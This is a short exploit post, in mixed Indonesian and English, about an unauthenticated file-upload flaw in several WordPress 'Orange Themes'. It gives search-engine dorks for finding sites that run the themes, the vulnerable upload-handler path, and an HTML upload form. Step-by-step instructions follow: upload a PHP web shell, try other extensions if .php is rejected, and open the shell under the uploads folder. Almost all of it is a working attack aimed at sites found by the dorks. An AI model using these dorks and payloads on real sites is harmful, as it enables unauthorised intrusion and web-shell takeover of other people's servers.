 |
| Wordpress Orange Themes CSRF File Upload Vulnerability |
DORK : inurl:"/wp-content/themes/agritourismo-theme/" inurl:"/wp-content/themes/bordeaux-theme/" inurl:"/wp-content/themes/bulteno-theme/" inurl:"/wp-content/themes/oxygen-theme/" inurl:"/wp-content/themes/radial-theme/" inurl:"/wp-content/themes/rayoflight-theme/" inurl:"/wp-content/themes/reganto-theme/" inurl:"/wp-content/themes/rockstar-theme/"
inurl:"/wp-content/themes/kernel-theme/"
Exploit : localhost/wp-content/themes/nama-tema/functions/upload-handler.php
CSRF :
<form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/rockstar-theme/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form>
Proof Of Concept
1. Dorking
2. Eksploitasi kalo vuln berarti muncul error
3. Upload shell .php with csrf, jika berhasil akan muncul nama filenya ^_^ kalo muncul notif no php berarti gagal coba bypass dengan format lain :(
File Access : http://site-target/wp-content/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/13/shell.php
0 Komentar
Berkomentarlah dengan bijak